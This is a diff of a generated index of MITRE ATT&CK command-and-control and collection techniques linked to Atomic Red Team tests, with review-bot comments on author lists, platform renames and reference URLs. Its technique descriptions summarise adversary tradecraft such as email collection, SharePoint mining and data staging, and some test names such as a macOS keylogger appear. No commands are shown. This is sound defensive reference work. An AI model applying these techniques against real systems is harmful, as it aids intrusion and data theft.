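Review bot: in the new `Malleable-C2-U42` reference the author list is run together with no separators ("Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj"), which will render as a single name; if that string comes from the source STIX data fix it there, otherwise post-process author lists when the index is generated. The rest of the hunk is consistent: `x_mitre_version` 1.0 to 2.0 matches the rename, and both citation keys added to the description, `ESET Okrum July 2019` and `Malleable-C2-U42`, have a matching `external_references` entry.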
@@ -42626,7 +43118,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -42686,7 +43177,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -42718,7 +43208,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -42744,8 +43234,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -42812,7 +43300,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests:
- name: Malicious User Agents - Nix
@@ -42930,7 +43417,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests:
- name: rsync remote file copy (push)
@@ -43291,7 +43777,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -43315,7 +43800,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -43338,8 +43823,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -43364,7 +43847,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -43384,8 +43867,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -43439,7 +43920,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -43542,7 +44022,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -43568,8 +44048,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -43623,7 +44101,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -43699,7 +44176,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests:
- name: Data Compressed - nix - zip
@@ -43942,7 +44418,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests:
- name: Screencapture
@@ -44076,7 +44551,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -44155,7 +44629,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: MacOS Swift Keylogger
@@ -44229,7 +44702,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -44244,30 +44717,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -44276,13 +44729,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -44296,20 +44753,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -44352,7 +44826,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests:
- name: using Quicktime Player
@@ -44410,7 +44883,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -44430,22 +44903,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -44462,11 +44937,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
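Review bot: `- Google Workspace` is removed from `x_mitre_platforms` for Email Collection and only `- Office Suite` is added, alongside the removal of `- Office 365`. If `Office Suite` is the upstream name that now covers both products, any per-platform index that matches on the literal string `Google Workspace` will stop listing T1114 unless the generator maps the new name back onto it; the same substitution is made for T1530 and T1213.002 elsewhere in this diff. Worth a check of the platform mapping in the index generator, and a line in the PR description, so Google Workspace coverage is not dropped silently.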
@@ -44482,37 +44956,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -44524,75 +44989,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests:
- name: Stage data from Discovery.sh
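Review bot: the Prevailion DarkWatchman reference now points at a Wayback Machine snapshot, `url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/`, instead of the live page, and the T1074.002 hunk further down makes a comparable URL change for the Mandiant M-Trends 2020 reference. Both are fine if they are the upstream ATT&CK values; if either was edited locally it should be reverted, since the generated index is meant to mirror the bundle and a hand edit would be overwritten on the next regeneration.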
@@ -44655,7 +45138,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -44679,13 +45162,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -44706,6 +45187,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -44729,8 +45211,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -44755,7 +45239,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -44822,7 +45305,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests:
- name: Execute commands from clipboard
@@ -44837,7 +45319,7 @@ collection:
name: bash
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -44871,10 +45353,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -44885,13 +45369,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -44932,37 +45417,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -44973,23 +45432,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -45059,7 +45542,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -45094,7 +45576,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -45113,10 +45595,89 @@ collection:
x_mitre_data_sources:
